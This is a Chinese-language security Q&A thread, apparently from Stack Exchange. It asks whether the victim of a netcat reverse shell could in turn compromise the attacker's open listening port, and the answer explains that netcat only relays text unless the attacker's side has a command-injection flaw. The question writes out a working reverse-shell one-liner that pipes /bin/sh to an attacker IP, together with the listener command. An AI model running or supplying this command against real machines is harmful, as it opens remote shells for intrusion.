我一直在使用专门的软件或恶意命令进入备份计算机和服务器,这些命令会在目标计算机上产生后门,然后将终端传输到我服务器上的侦听netcat会话。
虽然这是一个有趣的领域,但为了看看做这类事情有多容易,我有一些好奇心去尝试做其他的事情。
我想知道是否有可能在使用Netcat监听端口的服务器上产生后门。最好是Linux机器。该命令看起来类似于:
root@ubuntu:~# nc -lvk 9000
Listening on [0.0.0.0] (family 0, port 9000)
这基本上就是攻击者的服务器的样子。然后说他在等后门在受害者的机器上产卵。受害者会在他的Linux机器上运行一些命令,比如:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 9000 >/tmp/f
假设10.0.0.1
IP地址是攻击者的IP。此时,攻击者(在受害者运行此恶意命令之后)将看到以下内容:
root@ubuntu:~# nc -lvk 9000
Listening on [0.0.0.0] (family 0, port 9000)
$
从那里攻击者现在有一个终端从受害者管道到他的服务器。
我怎么可能滥用它,而不是受害者发送一个外壳给攻击者,受害者怎么能后门攻击者的开放端口(9000)
,正在使用Netcat?
发布于 2017-03-14 17:35:38
不,正如你所描述的,这是行不通的。netcat -lnvp
不应该执行任何命令。这只是文字聊天的一个方面而已。如您所示,您需要将这些消息连接到一个shell上,该shell将通过将shell管道传输到netcat来对文本进行处理。
除非攻击者计算机上存在漏洞,否则受害者只能发送文本。一个漏洞是netcat在发送的文本中执行命令,或者攻击者使用脚本来处理易受命令注入攻击的netcat输出。
https://security.stackexchange.com/questions/153842
复制相似问题